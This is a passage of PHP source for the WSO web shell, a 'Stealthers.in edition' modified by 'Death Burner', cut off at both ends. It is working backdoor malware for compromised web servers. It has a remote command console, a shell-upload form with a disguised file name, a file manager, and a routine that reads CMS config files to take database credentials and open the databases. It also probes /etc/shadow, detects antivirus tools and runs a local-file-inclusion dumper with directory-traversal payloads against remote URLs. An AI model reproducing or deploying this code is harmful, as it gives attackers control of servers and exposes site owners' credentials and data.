    var p1_ = '".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES))."';
    var p2_ = '".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES))."';
    var p3_ = '".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES))."';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('".addslashes($_SERVER['REQUEST_URI'])."', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>

<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";$freeSpace=@diskfreespace($GLOBALS['cwd']);$totalSpace=@disk_total_space($GLOBALS['cwd']);$totalSpace=$totalSpace?$totalSpace:1 ;$release=@php_uname('r');$kernel=@php_uname('s');if(!function_exists('posix_getegid')){$user=@get_current_user();$uid=@getmyuid();$gid=@getmygid();$group="?";}else {$uid=@posix_getpwuid(posix_geteuid());$gid=@posix_getgrgid(posix_getegid());$user=$uid['name'];$uid=$uid['uid'];$group=$gid['name'];$gid=$gid['gid'];}$cwd_links='';$path=explode("/",$GLOBALS['cwd']);$n=count($path);for($i=0 ;$i<$n-1 ;$i++){$cwd_links.="<a href='#' onclick='g(\"FilesMan\",\"";for($j=0 ;$j<=$i;$j++)$cwd_links.=$path[$j].'/';$cwd_links.="\")'>".$path[$i]."/</a>";}$charsets=array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');$opt_charsets='';foreach($charsets as $item)$opt_charsets.='<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';$m=array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');if(!empty($GLOBALS['auth_pass']))$m['Logout']='Logout';$m['Self remove']='SelfRemove';$menu='';foreach($m as $k=>$v)$menu.='<th width="'.(int)(100 /count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';$drives="";if($GLOBALS['os']=='win'){foreach(range('c','z') as $drive)if(is_dir($drive.':\\'))$drives.='<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';}echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr>'.'<td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os']=='win'?'<br>Drives:':'').'</span></td>'.'<td><nobr>'.substr(@php_uname(),0 ,120 ).' </nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#22ff22><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.wsoViewSize($totalSpace).' <span>Free:</span> '.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100 ).'%)<br>'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.'<td width=1>';ShowDefaultForm("<input type=hidden name=upload_shell value=\"1\"><input type=text name=fileName value=\"Iicense.php\" style=\"width:120px\"><br /><input type=submit name=submit value=\"upload shell\" style=\"width:120px\">");print "<br />".$upload_shell_result;echo '</td>'.'<td width=5></td>'.'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td>'.'</tr></table>'.'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';}function wsoFooter(){$is_writable=is_writable($GLOBALS['cwd'])?" <font color='#ccff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
	<tr>
		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMan'>
		<input type=hidden name=c value='".$GLOBALS['cwd']."'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
	</tr><tr>
	<td colspan=2>";ShowDefaultForm("<input type=hidden name=cms_info value=\"1\"><input type=submit name=submit value=\"get site info (WordPress, Joomla, DLE, Drupal, Bitrix)\">");if(isset($_POST['cms_info'])){$dir=(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);$cmsSqlData=array("host"=>"","user"=>"","pass"=>"","db"=>"");print '<textarea cols=100 rows=10>';if(is_file($dir."/wp-config.php")){$cmsFileSett=file_get_contents($dir."/wp-config.php");print "WordPress\r\n\r\n";preg_match('%\$table_prefix[^\']+\'(.+?)\'%i',$cmsFileSett,$cmsSettMatche);preg_match_all('%define\(\'(.+)\', \'(.*)\'\);%i',$cmsFileSett,$cmsSettMatches,PREG_SET_ORDER);$cmsDadaTmp=array();if(isset($cmsSettMatche[1 ]) && $cmsSettMatches>=4 ){foreach($cmsSettMatches as $cmsSettMatchesKey=>$cmsSettMatchesVal){$cmsDadaTmp[$cmsSettMatchesVal[1 ]]=$cmsSettMatchesVal[2 ];}if(isset($cmsDadaTmp['DB_NAME']) && isset($cmsDadaTmp['DB_USER']) && isset($cmsDadaTmp['DB_PASSWORD']) && isset($cmsDadaTmp['DB_HOST'])){$cmsSqlData=array("host"=>$cmsDadaTmp['DB_HOST'],"user"=>$cmsDadaTmp['DB_USER'],"pass"=>$cmsDadaTmp['DB_PASSWORD'],"db"=>$cmsDadaTmp['DB_NAME']);$db=new dbmysql($cmsSqlData['host'],$cmsSqlData['user'],$cmsSqlData['pass'],$cmsSqlData['db'],"utf-8");$query=$db->queryArr("SELECT `option_name`,`option_value` FROM `".$cmsSettMatche[1 ]."options`");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['option_name']]=$queryVal['option_value'];}print_r($cmsQuery);}}}if(is_file($dir."/configuration.php")){$cmsFileSett=file_get_contents($dir."/configuration.php");print "Joomla\r\n\r\n";print iconv("utf-8","windows-1251",$cmsFileSett);}if(is_file($dir."/engine/data/config.php")){$cmsFileSett=file_get_contents($dir."/engine/data/config.php");print "DLE\r\n\r\n";print str_replace(array("\r\n\r\n","\n\n"),array("\r\n","\n"),$cmsFileSett);}if(is_file($dir."/sites/default/settings.php")){$cmsFileSett=file_get_contents($dir."/sites/default/settings.php");print "Drupal\r\n\r\n";preg_match('%\'database\'[^\*\']+\'([^\']*)\'[^\*]+\'username\'[^\*\']+\'([^\']*)\'[^\*]+\'password\'[^\*\']+\'([^\']*)\'[^\*]+\'host\'[^\*\']+\'([^\']*)\'[^\*]+\'prefix\'[^\*\']+\'([^\']*)\'%is',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==6 ){$cmsSqlData=array("host"=>$cmsSettMatches[4 ],"user"=>$cmsSettMatches[2 ],"pass"=>$cmsSettMatches[3 ],"db"=>$cmsSettMatches[1 ],"prefix"=>$cmsSettMatches[5 ]);}else {preg_match('%\$db_url = \'[a-z]+://(.+?)@(.+?)/(.+?)\';[^*]+\$db_prefix = \'([^\']*)\';%i',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==5 ){$userPwd=explode(":",$cmsSettMatches[1 ]);if(!isset($userPwd[1 ])){$userPwd[1 ]='';}$cmsSqlData=array("host"=>$cmsSettMatches[2 ],"user"=>$userPwd[0 ],"pass"=>$userPwd[1 ],"db"=>$cmsSettMatches[3 ],"prefix"=>$cmsSettMatches[4 ]);}}if($cmsSqlData['host']!=""){$db=new dbmysql($cmsSqlData['host'],$cmsSqlData['user'],$cmsSqlData['pass'],$cmsSqlData['db'],"utf-8");$query=$db->queryArr("SELECT `name`,`value` FROM `".$cmsSqlData['prefix']."variable`");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['name']]=$queryVal['value'];}print_r($cmsQuery);$query=$db->queryArr("SELECT * FROM `".$cmsSqlData['prefix']."watchdog` LIMIT 1");print_r($query);}}if(is_file($dir."/bitrix/php_interface/dbconn.php")){$cmsFileSett=file_get_contents($dir."/bitrix/php_interface/dbconn.php");print "Bitrix\r\n\r\n";preg_match('%\$DBHost[^"]+"([^"]*).+?\n\$DBLogin[^"]+"([^"]*).+\n\$DBPassword[^"]+"([^"]*).+\n\$DBName[^"]+"([^"]*)"%is',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==5 ){$cmsSqlData=array("host"=>$cmsSettMatches[1 ],"user"=>$cmsSettMatches[2 ],"pass"=>$cmsSettMatches[3 ],"db"=>$cmsSettMatches[4 ]);$db=new dbmysql($cmsSqlData['host'],$cmsSqlData['user'],$cmsSqlData['pass'],$cmsSqlData['db'],"utf-8");$query=$db->queryArr("SELECT * FROM `b_lang`");print_r($query);$query=$db->queryArr("SELECT `NAME`,`VALUE` FROM `b_option` WHERE `MODULE_ID` = 'main'");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['NAME']]=$queryVal['VALUE'];}print_r($cmsQuery);}}print '</textarea>';print "<br />";ShowDefaultForm("
<input type=hidden name=cms_sql value=\"1\">
<input type=submit name=submit value=\"open site database\">
<input type=hidden name=\"type\" value=\"mysql\">
<input type=hidden name=\"sql_host\" value=\"".$cmsSqlData['host']."\">
<input type=hidden name=\"sql_login\" value=\"".$cmsSqlData['user']."\">
<input type=hidden name=\"sql_pass\" value=\"".$cmsSqlData['pass']."\">
<input type=hidden name=\"sql_base\" value=\"".$cmsSqlData['db']."\">
","Sql","query");}print "</td>
	</tr>
	</table>";print "<center>WSO ".WSO_VERSION." (Stealthers.in edition - Modified by Death Burner / Staf4)</center></div></body></html>";}if(!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}if(!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}function wsoEx($in){$out='';if(function_exists('exec')){@exec($in,$out);$out=@join("\n",$out);}elseif(function_exists('passthru')){ob_start();@passthru($in);$out=ob_get_clean();}elseif(function_exists('system')){ob_start();@system($in);$out=ob_get_clean();}elseif(function_exists('shell_exec')){$out=shell_exec($in);}elseif(is_resource($f=@popen($in,"r"))){$out="";while(!@feof($f))$out.=fread($f,1024 );pclose($f);}return $out;}function wsoViewSize($s){if($s>=1073741824 )return sprintf('%1.2f',$s/1073741824 ).' GB';elseif($s>=1048576 )return sprintf('%1.2f',$s/1048576 ).' MB';elseif($s>=1024 )return sprintf('%1.2f',$s/1024 ).' KB';else return $s.' B';}function wsoPerms($p){if(($p&0xc000 )==0xc000 )$i='s';elseif(($p&0xa000 )==0xa000 )$i='l';elseif(($p&0x8000 )==0x8000 )$i='-';elseif(($p&0x6000 )==0x6000 )$i='b';elseif(($p&0x4000 )==0x4000 )$i='d';elseif(($p&0x2000 )==0x2000 )$i='c';elseif(($p&0x1000 )==0x1000 )$i='p';else $i='u';$i.=(($p&0x0100 )?'r':'-');$i.=(($p&0x0080 )?'w':'-');$i.=(($p&0x0040 )?(($p&0x0800 )?'s':'x'):(($p&0x0800 )?'S':'-'));$i.=(($p&0x0020 )?'r':'-');$i.=(($p&0x0010 )?'w':'-');$i.=(($p&0x0008 )?(($p&0x0400 )?'s':'x'):(($p&0x0400 )?'S':'-'));$i.=(($p&0x0004 )?'r':'-');$i.=(($p&0x0002 )?'w':'-');$i.=(($p&0x0001 )?(($p&0x0200 )?'t':'x'):(($p&0x0200 )?'T':'-'));return $i;}function wsoPermsColor($f){if(!@is_readable($f))return '<font color=#FF0000>'.wsoPerms(@fileperms($f)).'</font>';elseif(!@is_writable($f))return '<font color=white>'.wsoPerms(@fileperms($f)).'</font>';else return '<font color=#ccff00>'.wsoPerms(@fileperms($f)).'</font>';}if(!function_exists("scandir")){function scandir($dir){$dh=opendir($dir);while(false!==($filename=readdir($dh)))$files[]=$filename;return $files;}}function wsoWhich($p){$path=wsoEx('which '.$p);if(!empty($path))return $path;return false;}function actionSecInfo(){wsoHeader();echo '<h1>Server security information</h1><div class=content>';function wsoSecParam($n,$v){$v=trim($v);if($v){echo '<span>'.$n.': </span>';if(strpos($v,"\n")===false)echo $v.'<br>';else echo '<pre class=ml1>'.$v.'</pre>';}}wsoSecParam('Server software',@getenv('SERVER_SOFTWARE'));if(function_exists('apache_get_modules'))wsoSecParam('Loaded Apache modules',implode(', ',apache_get_modules()));wsoSecParam('Disabled PHP Functions',$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');wsoSecParam('Open base dir',@ini_get('open_basedir'));wsoSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));wsoSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));wsoSecParam('cURL support',function_exists('curl_version')?'enabled':'no');$temp=array();if(function_exists('mysql_get_client_info'))$temp[]="MySql (".mysql_get_client_info().")";if(function_exists('mssql_connect'))$temp[]="MSSQL";if(function_exists('pg_connect'))$temp[]="PostgreSQL";if(function_exists('oci_connect'))$temp[]="Oracle";wsoSecParam('Supported databases',implode(', ',$temp));echo '<br>';if($GLOBALS['os']=='nix'){wsoSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');wsoSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');wsoSecParam('OS version',@file_get_contents('/proc/version'));wsoSecParam('Distr name',@file_get_contents('/etc/issue.net'));if(!$GLOBALS['safe_mode']){$userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');$danger=array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');$downloaders=array('wget','fetch','lynx','links','curl','get','lwp-mirror');echo '<br>';$temp=array();foreach($userful as $item)if(wsoWhich($item))$temp[]=$item;wsoSecParam('Userful',implode(', ',$temp));$temp=array();foreach($danger as $item)if(wsoWhich($item))$temp[]=$item;wsoSecParam('Danger',implode(', ',$temp));$temp=array();foreach($downloaders as $item)if(wsoWhich($item))$temp[]=$item;wsoSecParam('Downloaders',implode(', ',$temp));echo '<br/>';wsoSecParam('HDD space',wsoEx('df -h'));wsoSecParam('Hosts',@file_get_contents('/etc/hosts'));}}else {wsoSecParam('OS Version',wsoEx('ver'));wsoSecParam('Account Settings',wsoEx('net accounts'));wsoSecParam('User Accounts',wsoEx('net user'));}echo '</div>';wsoFooter();}function actionlfiscan(){wsoHeader();print '
   <h3>Death Burner\'s LFI File dumper</h3>

   <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
      LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
         <option value="1">
            Access Log
         </option>

         <option value="2">
            httpd.conf
         </option>

         <option value="3">
            Error Log
         </option>
         <option value="4">
            php.ini
         </option>
         <option value="5">
            MySQL
         </option>
         <option value="6">
            FTP
         </option>
         <option value="7">
            Environ
         </option>
      </select> Null: <select name="null">
         <option value="%00">
            Yes
         </option>

         <option value="">
            No
         </option>
      </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
   </form>';error_reporting(0 );if($_POST['lfiurl']){print "<pre>";$cheader=$_POST['custom_header'];$target=$_POST['lfiurl'];$type=$_POST['scantype'];$byte1=$_POST['null'];$lfitest="../../../../../../../../../../../../../../etc/passwd".$byte1."";$lfitest2="../../../../../../../../../../../../../../fake/file".$byte1."";$lfiprocenv="../../../../../../../../../../../../../../proc/environ".$byte1."";$lfiaccess=array(1 =>"../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",2 =>"../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",3 =>"../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",4 =>"../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",5 =>"../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",6 =>"../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",7 =>"../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",8 =>"../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",9 =>"../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",10 =>"../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",11 =>"../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",12 =>"../../../../../../../../../../../../../../var/log/access_log".$byte1."",13 =>"../../../../../../../../../../../../../../var/log/access.log".$byte1."",14 =>"../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",15 =>"../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",16 =>"../../../../../../../../../../../../../../logs/access.log".$byte1."",17 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",18 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",19 =>"../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",20 =>"../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",21 =>"../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",22 =>"../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",23 =>"../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");$lfierror=array(1 =>"../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",2 =>"../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",3 =>"../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",4 =>"../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",5 =>"../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",6 =>"../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",7 =>"../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",8 =>"../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",9 =>"../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",10 =>"../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",11 =>"../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",12 =>"../../../../../../../../../../../../../../var/log/error_log".$byte1."",13 =>"../../../../../../../../../../../../../../var/log/error.log".$byte1."",14 =>"../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",15 =>"../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",16 =>"../../../../../../../../../../../../../../logs/error.log".$byte1."",17 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",18 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",19 =>"../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",20 =>"../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",21 =>"../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",22 =>"../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",23 =>"../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");$lficonfig=array(1 =>"../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",2 =>"../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",3 =>"../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",4 =>"../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",5 =>"../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",6 =>"../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",7 =>"../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",8 =>"../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",9 =>"../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",10 =>"../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",11 =>"../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",12 =>"../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",13 =>"../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",14 =>"../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",15 =>"../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",16 =>"../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",17 =>"../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",18 =>"../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",19 =>"../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",20 =>"../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",21 =>"../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",22 =>"../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",23 =>"../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",24 =>"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",25 =>"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",26 =>"../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",27 =>"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",28 =>"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",29 =>"../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",30 =>"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",31 =>"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",32 =>"../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",33 =>"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",34 =>"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",35 =>"../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");$lfiphpini=array(1 =>"../../../../../../../../../../../../../../../etc/php.ini".$byte1."",2 =>"../../../../../../../../../../../../../../../bin/php.ini".$byte1."",3 =>"../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",4 =>"../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",5 =>"../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",6 =>"../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",7 =>"../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",8 =>"../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",9 =>"../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",10 =>"../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",11 =>"../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",12 =>"../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",13 =>"../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",14 =>"../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",15 =>"../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",16 =>"../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",17 =>"../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",18 =>"../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",19 =>"../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",20 =>"../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",21 =>"../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",22 =>"../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",23 =>"../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",24 =>"../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",25 =>"../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",26 =>"../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",27 =>"../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");$lfimysql=array(1 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",2 =>"../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",3 =>"../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",4 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",5 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",6 =>"../../../../../../../../../../../../../../../var/mysql.log".$byte1."",7 =>"../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",8 =>"../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",9 =>"../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",10 =>"../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");$lfiftp=array(1 =>"../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",2 =>"../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",3 =>"../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",4 =>"../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",5 =>"../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",6 =>"../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",7 =>"../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",8 =>"../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",9 =>"../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",10 =>"../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",11 =>"../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",12 =>"../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",13 =>"../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",14 =>"../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",15 =>"../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",16 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",17 